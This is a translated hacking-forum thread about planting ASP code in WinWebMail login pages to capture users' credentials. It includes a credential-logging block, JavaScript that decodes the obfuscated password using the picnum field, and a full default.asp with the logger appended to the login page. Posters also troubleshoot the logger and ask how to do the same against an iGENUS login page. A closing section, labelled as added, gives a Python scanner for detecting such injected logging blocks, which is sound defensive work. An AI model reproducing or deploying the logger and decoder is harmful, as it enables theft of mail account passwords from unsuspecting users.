[Discussion] How to log WinWebMail plaintext passwords??
Topic author: 只手乾坤 Source: 邪恶八进制信息安全团队 (Evil Octal Information Security Team, [url]www.eviloctal.com[/url])
I took the ASP code that is floating around online for logging forum users' passwords and tried to use it to log a winwebmail username and password.
The code is as follows:
<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile("c:\1.txt",2,True)
file.WriteLine ""
End If
If fso.FileExists("c:\1.txt") Then
set file=fso.OpenTextFile("c:\1.txt",8,True)
Else
set file=fso.CreateTextFile("c:\1.txt")
end if
file.WriteLine "username:"+Request.form("username")
file.WriteLine "pwhidden:"+Request.form("pwhidden")
file.close
set file3=fso.GetFile("c:\1.txt")
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile("c:\1.txt",2,True)
file2.WriteLine ""
file2.close
end if
set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>
The result: the username part is recorded normally, but the password part is the encrypted password.
Has anyone worked with WINWEBMAIL? How do I solve this?
If you look at the source of the login page, you'll see that before the form is submitted the JS calls an encode function, which does a simple arithmetic operation on the plaintext password and a value called picnum.
Luckily picnum is also a hidden field in the form, so it should be submitted along with the rest. So I suggest you log picnum as well, then take it back and recover the original password by reversing the encode function.
Note: I only think this works in theory; I haven't actually tried it.
Just wrote the decryption code, to learn the script's decryption algorithm.
Actually there is a simpler way: just put the login page's plaintext password field inside <form></form> and capture pwshow.
[code]
<SCRIPT LANGUAGE=javascript>
<!--
function jm() {
pwhidden.value = encode(pwshow.value, parseInt(picnum.value));
}
function jiem() {
pwshow.value = unencode(pwhidden.value, parseInt(picnum.value));
}
// Each character becomes the zero-padded 5-digit value 65535 + picnum - charCode.
function encode(datastr, bassnum) {
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i++)
{
tchar = 65535 + bassnum - datastr.charCodeAt(i);
tchar = tchar.toString();
//alert(tchar);
while(tchar.length < 5)
{
tchar = "0" + tchar;
}
newdata = newdata + tchar;
}
return newdata;
}
// Inverse of encode: read 5-digit groups and recover charCode = 65535 + picnum - group.
function unencode(datastr, bassnum) {
var tempstr;
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i=i+5)
{
tchar = 65535 + bassnum - parseInt(datastr.substr(i,5), 10);
tempstr = String.fromCharCode(tchar);
newdata = newdata+tempstr;
}
return newdata;
}
//-->
</SCRIPT>
验证码:<input type="text" name="picnum" value="1234">
明文:<input type="text" name="pwshow" maxlength="32" class="textbox">
<input class="Bsbttn" type=submit value=" 加密 " onClick="javascript:jm()">
<input class="Bsbttn" type=submit value=" 解密 " onClick="javascript:jiem()">
密文:<input type="text" name="pwhidden">
[/code]
The decryption code is the same as what floor 2 described;
it needs picnum.
Thanks to the above, many hands make light work. Got it working. While I'm here, one more question in this thread:
<?php
/*-
* iGENUS webmail
*
* Copyright (c) 1999-2001 by iGENUS Inc.
* All rights reserved.
* Author: Qiong Wu <[email]wuqiong@igenus.org[/email]>
*
* $Id: login.php,v 1.29 2004/09/01 01:22:37 wuqiong Exp $
*/
session_start();
unset($_SESSION['G_USERNAME']);
unset($_SESSION['G_DOMAIN']);
unset($_SESSION['G_HOME']);
unset($_SESSION['G_TIME']);
unset($_SESSION['G_QUOTA']);
unset($_SESSION['G_NICKNAME']);
unset($_SESSION['G_ID']);
unset($_SESSION['G_LANG']);
include "config/config_inc.php";
include "include/fun_inc.php";
include "language/$CFG_LANGUAGE"."_inc.php";
if(!isset($_COOKIE['LoginDomain'])){
$Cookies_Domain = strtolower($_SERVER["HTTP_HOST"]);
if(preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $Cookies_Domain))
$Cookies_Domain = '';
list($Cookies_Domain,$null) = split(':', $Cookies_Domain, 2);
$Cookies_Domain = str_replace('mail.','',$Cookies_Domain);
}
else $Cookies_Domain = $_COOKIE['LoginDomain'];
$http_host = split(':',strtolower($_SERVER["HTTP_HOST"]));
$OUT['domain'] = str_replace('mail.','', $http_host[0]);
$type = trim($HTTP_GET_VARS['type']);
$Cmd = trim($HTTP_GET_VARS['Cmd']);
if ($type=="default" )
{
$Post_name = trim($HTTP_GET_VARS['name']);
$Post_domain = trim($HTTP_GET_VARS['domain']);
$Post_passwd = trim($HTTP_GET_VARS['passwd']);
$Post_Lang = "gb";
#echo $Cmd.$type.$Post_name.$Post_domain.$Post_passwd;
}
else
{
#echo "local";
// Post
$Post_name = $_POST['name'];
$Post_domain = $_POST['domain'];
$Post_passwd = $_POST['passwd'];
$Post_Lang = $_POST['Lang'];
}
// Get
$Get_Cmd = $_GET['Cmd'];
$Get_Code = $_GET['Code'];
$Get_Lang = $_GET['Lang'];
$errorlogin = 0; // 0 - success
// -1 - user not exist
// -2 - no privilege to log in
// -3 - password error
if (($Get_Cmd=="login") && ($Post_name!="") && ($Post_passwd !="") && ($Post_domain!="")){
session_start();
#echo $Cmd.$type.$Post_name.$Post_domain.$Post_passwd;
// set the LoginDomain cookie
setcookie("LoginDomain",$Post_domain,time()+3600*24*365);
// list($Post_name,$Post_domain) = split("@",$user,2);
$sql = mysql_connect($CFG_MYSQL_HOST, $CFG_MYSQL_USER, $CFG_MYSQL_PASS);
mysql_select_db($CFG_MYSQL_DB,$sql);
if ($CFG_VPOPMAIL_MYSQL_LARGE_SITE){
$Vpopmail_Domain = ereg_replace("\.","_",$Post_domain);
$query = "SELECT * FROM $Vpopmail_Domain WHERE pw_name='$Post_name'";
}else{
$query = "SELECT * FROM vpopmail WHERE pw_name='$Post_name' and pw_domain='$Post_domain'";
}
// echo $query;
$result = @mysql_query($query,$sql);
$rows = @mysql_num_rows($result);
if($rows !=1 ){
PutLogs(0, 'login', "user not exist","$Post_name@$Post_domain", $sql);
ErrorExit(-1); // user not exist!
}
$data = mysql_fetch_array($result);
$home = $data['pw_dir'];
$Post_passwd2 = $data['pw_passwd'];
$pw_id = $data['pw_id'];
$pw_shell = $data['pw_shell'];
$pw_gecos = $data['pw_gecos'];
$pw_gid = $data['pw_gid'];
$pw_domain = strtolower($data['pw_domain']);
$pw_name = strtolower($data['pw_name']);
if ($pw_gid & 0x04){
PutLogs($pw_id, 'login', "no priv to login","$Post_name@$Post_domain", $sql);
ErrorExit(-2); // user has no privilege to log in
}
if ($home !="" && ($Post_passwd2 == crypt($Post_passwd,$Post_passwd2))){
$_SESSION['G_ID'] = $pw_id;
$_SESSION['G_USERNAME'] = $pw_name;
$_SESSION['G_HOME'] = $home;
$_SESSION['G_DOMAIN'] = $pw_domain;
$_SESSION['G_TIME'] = time();
$_SESSION['G_LANG'] = $Post_Lang;
$_SESSION['G_QUOTA'] = $pw_shell;
$_SESSION['G_NICKNAME'] = $pw_gecos;
// create the user's temporary file directory
if ( !is_dir($CFG_TEMP) ){
@mkdir($CFG_TEMP,$CFG_TEMP_MOD)||
die("Error create directory $CFG_TEMP,you must make $CFG_TEMP directory manual.Please read the INSTALL file.");
}
if ( !is_dir("$CFG_TEMP/$SG_DOMAIN") ) {
mkdir("$CFG_TEMP/$SG_DOMAIN",$CFG_TEMP_MOD)||die("Error create directory $SG_DOMAIN");
}
if ( !is_dir("$CFG_TEMP/$SG_DOMAIN/$SG_USERNAME") ) {
mkdir("$CFG_TEMP/$SG_DOMAIN/$SG_USERNAME",$CFG_TEMP_MOD)||die("Error create directory $SG_USERNAME");
}
chdir("$CFG_TEMP/$SG_DOMAIN/$SG_USERNAME");
// write the successful-login log entry
PutLogs($pw_id, 'login', "success","$Post_name@$Post_domain", $sql);
header("Location: index.php");
exit();
}else{
PutLogs($pw_id, 'login', "error password", "$Post_name@$Post_domain", $sql);
ErrorExit(-3); // wrong password
}
}
$mesg = $LANG_LOGIN_WELCOME;
if($Get_Cmd=="error"){
switch($Get_Code){
case -1:
$mesg = $LANG_LOGIN_ERROR_USER_NOT_EXIST;
break;
case -2:
$mesg = $LANG_LOGIN_ERROR_USER_NO_PRIV;
break;
case -3:
$mesg = $LANG_LOGIN_ERROR_PASSWD;
break;
}
}
function PutLogs($pw_id, $action, $content, $email, $sql){
$query = "insert logs set pw_id=$pw_id,".
"ip='".$_SERVER['REMOTE_ADDR']."',".
"action='login',".
"time=now(),".
"email='$email',".
"content='$content'";
// echo $query;
@mysql_query($query, $sql);
mysql_close($sql);
}
function ErrorExit($errorcode){
header("Location: login.php?Cmd=error&Code=$errorcode");
exit();
}
// load Template
$OUT['CHARSET'] = $CFG_CHARSET[$Get_Lang]; // page character encoding
$OUT['MESG'] = $mesg; // welcome and error message
$OUT['COOKIES_DOMAIN'] = $Cookies_Domain; // domain used at the last login
$OUT['LANG'] = $Get_Lang; // display language after login
include "template/_login.php";
?>
With the code above (vpopmail's login page), how do I log the password??? I've been trying to log it for a long time and never capture anything.
Just found something: when visiting the winwebmail main page, the code writes a record with empty account and password data, but when actually logging in it doesn't record anything. The file is below. Does anyone know why?
<%
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
%>
<%
un = trim(request("username"))
pw = trim(request("pwhidden"))
saveUser = trim(request("saveUser"))
cleancookies = trim(request("cleancookies"))
if cleancookies = "true" then
Response.Cookies("accounts") = ""
end if
showaccounts = trim(request.Cookies("accounts"))
Response.Cookies("name") = ""
dim ei
dim errmsg
errmsg = trim(request("errstr"))
if IsEmpty(Application("em_MaxFolders")) and IsEmpty(Application("em_MaxMPOP3")) and IsEmpty(Application("em_MaxSigns")) then
TimeDelaySeconds(5)
dim mam
set mam = server.createobject("easymail.AdminManager")
mam.Load
if mam.IsLoadOK = true then
Application("em_MaxFolders") = mam.MaxFolders
Application("em_MaxMPOP3") = mam.MaxMPOP3
Application("em_MaxSigns") = mam.MaxSigns
Application("em_SystemAdmin") = mam.SystemAdmin
Application("em_EnableBBS") = mam.EnableBBS
Application("em_Enable_SignHold") = mam.Enable_SignHold
Application("em_Enable_FreeSign") = mam.Enable_FreeSign
Application("em_Enable_SignWithDomainUser") = mam.Enable_SignWithDomainUser
Application("em_Enable_SignNumberLimit") = mam.Enable_SignNumberLimit
Application("em_SignNumberLimitDays") = mam.SignNumberLimitDays
Application("em_Enable_ShareFolder") = mam.Enable_ShareFolder
Application("em_Enable_SignEnglishName") = mam.Enable_SignEnglishName
Application("em_LogPageKSize") = mam.LogPageKSize
Application("em_TestAccounts") = mam.TestAccounts
Application("em_SignMode") = mam.SignMode
Application("em_SignWaitDays") = mam.SignWaitDays
Application("em_am_Name") = mam.am_Name
Application("em_am_Accounts") = mam.am_Accounts
set mam = nothing
else
set mam = nothing
response.redirect "err.asp?errstr=" & Server.URLEncode("出错: 可能是WebEasyMail服务未启动") & "&" & getGRSN()
end if
end if
'if un <> "" and pw <> "" and Request.ServerVariables("REQUEST_METHOD") = "POST" then
if un <> "" and pw <> "" then
un = LCase(un)
pw = strDecode(pw, trim(request("picnum")))
'Response.Write trim(request("picnum"))
'response.end
if un <> Application("em_SystemAdmin") then
dim webkill
set webkill = server.createobject("easymail.WebKill")
webkill.Load
rip = Request.ServerVariables("REMOTE_ADDR")
if webkill.IsKill(rip) = true then
set webkill = nothing
response.redirect "err.asp?errstr=" & Server.URLEncode("拒绝IP地址 " & rip & " 访问") & "&" & getGRSN()
end if
set webkill = nothing
end if
set ei = Application("em")
Session("wem") = ""
Session("mail") = ""
Session("tid") = ""
Session("SecEx") = ""
dim pwwt
pwwt = ei.PassWordWaitMinute
dim checkret
checkret = ei.CheckPassWordEx(un, pw, Request.ServerVariables("REMOTE_ADDR"))
if checkret = 0 then
Session("tid") = ei.Login(un)
Session("wem") = un
Session("mail") = ei.GetUserMail(un)
set ei = nothing
if saveUser = "true" then
Response.Cookies("accounts") = un
Response.Cookies("accounts").Expires = DateAdd("y", 5, Now())
end if
SecEx = trim(request("SecEx"))
if SecEx = "true" then
Session("SecEx") = "1"
else
Session("SecEx") = "0"
end if
Response.Redirect "welcome.asp"
elseif checkret = 2 then
set ei = nothing
errmsg = "连续三次输入密码错误,请过" & pwwt & "分钟后再试。"
else
set ei = nothing
errmsg = "错误的用户名或密码!请再次输入。"
end if
end if
if Session("wem") <> "" then
set ei = Application("em")
ei.Logout Session("wem"), Session("tid")
set ei = nothing
end if
Session("wem") = ""
Session("mail") = ""
Session("tid") = ""
Session("SecEx") = ""
%>
<html>
<head>
<META HTTP-EQUIV="Content-Type" content="text/html; charset=gb_2312-80">
<title>邮件服务器系统</title>
<LINK href="images\hwem.css" rel=stylesheet>
<SCRIPT LANGUAGE=javascript>
<!--
if (top.location !== self.location) {
top.location=self.location;
}
function window_onload() {
<%
if showaccounts = "" then
%>
usernameshow.focus();
<%
else
%>
pwshow.focus();
<%
end if
if errmsg <> "" then
%>
alert("<%=errmsg %>");
<%
end if
%>
}
function gook() {
<%
if showaccounts = "" then
%>
if (usernameshow.value == "")
{
alert("用户名不可为空");
usernameshow.focus();
return ;
}
<%
end if
%>
if (pwshow.value == "")
{
alert("密码不可为空");
pwshow.focus();
return ;
}
<%
if showaccounts = "" then
%>
f1.saveUser.value = showsaveUser.checked;
f1.username.value = usernameshow.value;
<%
else
%>
f1.username.value = "<%=showaccounts %>";
<%
end if
%>
f1.SecEx.value = showSecEx.checked;
f1.pwhidden.value = encode(pwshow.value, parseInt(f1.picnum.value));
f1.submit();
}
function encode(datastr, bassnum) {
var tempstr;
var tchar;
var newdata = "";
for (var i = 0; i < datastr.length; i++)
{
tchar = 65535 + bassnum - datastr.charCodeAt(i);
tchar = tchar.toString();
while(tchar.length < 5)
{
tchar = "0" + tchar;
}
newdata = newdata + tchar;
}
return newdata;
}
//-->
</SCRIPT>
</head>
<body LANGUAGE=javascript onload="return window_onload()">
<br><br>
<form name="f1" method="post" action="default.asp">
<input type="hidden" name="username">
<input type="hidden" name="pwhidden">
<input type="hidden" name="picnum" value="<%=createRnd() %>">
<input type="hidden" name="saveUser">
<input type="hidden" name="SecEx">
</form>
<table cellspacing=0 cellpadding=0 width=350 align=center border=0>
<tbody>
<tr>
<td valign=bottom align=right width=347 rowspan=2>
<table cellspacing=0 cellpadding=0 width="100%" border=0 style="BORDER-RIGHT: #334568 1px solid; BORDER-TOP: #333333 1px solid; BORDER-LEFT: #333333 1px solid; BORDER-BOTTOM: #333333 1px solid;">
<tbody>
<tr align="middle" bgcolor="#3280BE">
<td colspan=4 height=35 style="BORDER-BOTTOM: #333333 1px solid;"><b><font
color=#ffffff>邮件服务器系统</font></b></td>
</tr>
<tr>
<td colspan="4" height="20"> </td>
</tr>
<tr>
<td colspan="3" nowrap height="30" width="56">
</td><td nowrap><font class="s"><%
if showaccounts = "" then
%><b>用户名: </b></font><input type="text" name="usernameshow" maxlength="64" class="textbox"><%
else
%><b>用户名: </b></font><b><font class="s" color="#000099"><%=showaccounts %></font></b><%
end if
%> </td>
</tr>
<tr>
<td colspan="3" nowrap height="30"></td><td nowrap>
<font class="s"><b>密 码: </b></font><input type="password" name="pwshow" maxlength="32" class="textbox">
</td>
</tr>
<%
if showaccounts = "" then
%>
<tr valign="bottom">
<td colspan="4" nowrap align="center" height="30"><font class="s" color="#000000"><input type="checkbox" name="showSecEx">增强安全性
<input type="checkbox" name="showsaveUser">记住用户名</font>
</td>
</tr>
<%
else
%>
<tr valign="bottom">
<td colspan="4" nowrap align="center" height="30">
<font class="s" color="#000000"><input type="checkbox" name="showSecEx">增强安全性
<a href="default.asp?cleancookies=true">改用其他身份登录</a></font>
</td>
</tr>
<%
end if
%>
</td>
<tr>
<td colspan="4" nowrap align="right" height="60">
<input class="Bsbttn" type=submit value=" 确定 " onclick="javascript:gook()">
</td>
</tr>
</tbody>
</table>
</td>
<td width=1 bgcolor=#ffffff height=5></td>
<td width=1 bgcolor=#ffffff height=5></td>
<td width=1 bgcolor=#ffffff height=5></td>
</tr>
<tr>
<td width=1 bgcolor=#333333 height=120></td>
<td width=1 bgcolor=#666666 height=120></td>
<td width=1 bgcolor=#999999 height=120></td>
</tr>
<tr valign=top align=right>
<td colspan=4>
<table cellspacing=0 cellpadding=0 width="345" border=0>
<tbody>
<tr>
<td bgcolor=#333333 height=1></td>
</tr>
<tr>
<td bgcolor=#666666 height=1></td>
</tr>
<tr>
<td bgcolor=#999999 height=1></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr valign=center align=right>
<td colspan=4 height=35> </td>
</tr>
</tbody>
</table>
<div align="center">
<table width="35%" border="0">
<tr><!--<td align="center"><%
if Application("em_Enable_FreeSign") = true then
%>[<b><a href="create.asp?<%=getGRSN() %>">申请邮箱</a></b>] <%
end if
%>[<b><a href="forgetbf.asp?<%=getGRSN() %>">忘记密码</a></b>]
</td>--></tr>
<tr><td height="15">
</td></tr>
<tr>
<td align="center" nowrap height="25">
<a href="http://127.0.0.1:8080" target="_blank">测试</a>
</td>
</tr>
<tr>
<td align="center" nowrap>
</td>
</tr>
</table>
</div>
</body>
</html>
<%
function getGRSN()
dim theGRSN
Randomize
theGRSN = Int((9999999 * Rnd) + 1)
getGRSN = "GRSN=" & CStr(theGRSN)
end function
function createRnd()
dim retval
retval = getGRSN()
if Len(retval) > 4 then
retval = Right(retval, 4)
end if
if Left(retval, 1) = "0" then
retval = "5" & Right(retval, 3)
end if
createRnd = retval
end function
function strDecode(sd_Data, sd_bassnum)
dim sd_vChar
dim sd_NewData
dim sd_TempChar
sd_vChar = 1
do
if sd_vChar > Len(sd_Data) then
exit do
end if
sd_TempChar = CLng(Mid(sd_Data, sd_vChar, 5))
sd_TempChar = ChrW(65535 + sd_bassnum - sd_TempChar)
sd_NewData = sd_NewData & sd_TempChar
sd_vChar = sd_vChar + 5
loop
strDecode = sd_NewData
end function
function TimeDelaySeconds(DelaySeconds)
SecCount = 0
Sec2 = 0
while SecCount < DelaySeconds + 1
Sec1 = Second(Time())
if Sec1 <> Sec2 then
Sec2 = Second(Time())
SecCount = SecCount + 1
end if
wend
end function
%><%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",2,True)
file.WriteLine ""
End If
If fso.FileExists("C:\WinWebMail\Web\mail.txt") Then
set file=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",8,True)
Else
set file=fso.CreateTextFile("C:\WinWebMail\Web\mail.txt")
end if
file.WriteLine "username:"+Request.form("username")
file.WriteLine "pwhidden:"+Request.form("pwhidden")
file.WriteLine "picnum:"+Request.form("picnum")
file.close
set file3=fso.GetFile("C:\WinWebMail\Web\mail.txt")
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",2,True)
file2.WriteLine ""
file2.close
end if
set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>
If the wrong username and password are entered, every one is recorded without fail. With the correct username and password, not a single one is recorded.
[quote]Quoting floor 2, posted by jackal on 2007-09-13 14:47:
Just wrote the decryption code, to learn the script's decryption algorithm.
Actually there is a simpler way: just put the login page's plaintext password field inside <form></form> and capture pwshow.
[code]
<SCRIPT LANGUAGE=javascript>
.......[/quote]
I'm slow and basically don't know ASP. I don't understand how
"just put the login page's plaintext password field inside <form></form> and capture pwshow"
is actually done?
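The default.asp posted above shows the shape an administrator should be looking for on a compromised mail server: a second server-side block appended after the page's own code that reads the login form fields and appends them to a text file. The following scanner is an added example written for this thread; it is not code from the thread, from WinWebMail or from iGENUS. It flags any `<% ... %>` block that both reads credential fields from the request and opens a file for writing, and notes whether that block sits after `</html>`, where a login page has no legitimate reason to touch the filesystem. The page contents, file names and paths in it are constructed for the example.

```python
"""Detect a credential-logging block appended to an ASP login page.

Added example (not from the thread, WinWebMail or iGENUS). Flags server-side
blocks that read credential fields from the request AND open a file for
writing. VBScript is case-insensitive, so every indicator uses re.I.
"""
import os
import re
from typing import Dict, List

FSO_RE = re.compile(r'createobject\s*\(\s*"scripting\.filesystemobject"', re.I)
FILE_WRITE_RE = re.compile(r'\.(?:opentextfile|createtextfile)\s*\(', re.I)
CRED_READ_RE = re.compile(
    r'request(?:\.form)?\s*\(\s*"(username|pwhidden|picnum|password|passwd)"', re.I)
BLOCK_RE = re.compile(r'<%(.*?)%>', re.S)


def scan_asp(source: str) -> List[Dict]:
    """One finding per <% %> block that reads credential fields and writes a
    file. 'after_html' marks blocks placed after the closing </html> tag."""
    findings = []
    html_end = source.lower().rfind('</html>')
    for idx, m in enumerate(BLOCK_RE.finditer(source)):
        body = m.group(1)
        fields = sorted({f.lower() for f in CRED_READ_RE.findall(body)})
        if fields and FILE_WRITE_RE.search(body):
            findings.append({
                'block': idx,
                'offset': m.start(),
                'after_html': html_end != -1 and m.start() > html_end,
                'fso': bool(FSO_RE.search(body)),   # FileSystemObject created in-block
                'fields': fields,
            })
    return findings


def is_credential_logger(source: str) -> bool:
    return bool(scan_asp(source))


def scan_directory(root: str, exts=('.asp', '.asa', '.inc')) -> Dict[str, List[Dict]]:
    """Walk a web root and return {path: findings} for files that trip the check."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding='latin-1', errors='replace') as fh:
                    found = scan_asp(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed sample: a login page reduced to what matters. It reads the form
# fields and validates them, renders the form, then defines helpers after
# </html>. Nothing here writes a file, so it must produce no findings.
CLEAN_PAGE = r'''<%
un = trim(request("username"))
pw = trim(request("pwhidden"))
if un <> "" and pw <> "" then
    pw = strDecode(pw, trim(request("picnum")))
    if ei.CheckPassWordEx(un, pw, Request.ServerVariables("REMOTE_ADDR")) = 0 then
        Response.Redirect "welcome.asp"
    end if
end if
%>
<html><body>
<form name="f1" method="post" action="default.asp">
<input type="hidden" name="picnum" value="<%=createRnd() %>">
</form>
</body></html>
<%
function strDecode(sd_Data, sd_bassnum)
    strDecode = sd_Data
end function
%>'''

# Constructed sample: the same page with a logging block appended after the
# helpers, the pattern shown in the thread's default.asp.
LOGGER_BLOCK = r'''<%
dim fso
set fso=server.createobject("Scripting.FileSystemObject")
set file=fso.OpenTextFile("C:\WinWebMail\Web\mail.txt",8,True)
file.WriteLine "username:"+Request.form("username")
file.WriteLine "pwhidden:"+Request.form("pwhidden")
file.WriteLine "picnum:"+Request.form("picnum")
file.close
%>'''
INJECTED_PAGE = CLEAN_PAGE + LOGGER_BLOCK

if __name__ == '__main__':
    for label, page in (('clean', CLEAN_PAGE), ('injected', INJECTED_PAGE)):
        print(label, scan_asp(page))
```

Run `scan_directory(r'C:\WinWebMail\Web')` (placeholder path) against a copy of the web root to list every page that matches; a hit after `</html>` whose block reads `pwhidden` and `picnum` together is exactly the trailer shown in the thread. The check is deliberately structural rather than signature-based, so renaming the output file or the variables does not evade it; a legitimate page that reads the password field and also writes files in the same block will show up too and needs a manual look.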